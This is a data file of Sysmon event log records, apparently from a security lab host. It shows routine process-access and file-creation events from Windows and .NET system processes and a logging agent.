{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7649,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-0010D0D90B00}\r\nTargetProcessId: 4140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-0010D0D90B00}","TargetProcessId":"4140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7650,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7651,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:08.450\r\nProcessGuid: {E2A3D6B1-1333-5F25-0000-0010D0D90B00}\r\nProcessId: 4140\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\102c-0\\Microsoft.Internal.Tasks.Dataflow.dll\r\nCreationUtcTime: 2020-08-01 07:01:08.450","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:08.450","ProcessGuid":"{E2A3D6B1-1333-5F25-0000-0010D0D90B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\102c-0\\Microsoft.Internal.Tasks.Dataflow.dll","CreationUtcTime":"2020-08-01 07:01:08.450","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7652,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.497\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010D0DD0B00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.497","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010D0DD0B00}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7653,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.497\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010D0DD0B00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.497","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010D0DD0B00}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7654,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010D0DD0B00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010D0DD0B00}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7655,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.528\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001028E10B00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.528","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001028E10B00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7656,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.528\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001028E10B00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.528","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001028E10B00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
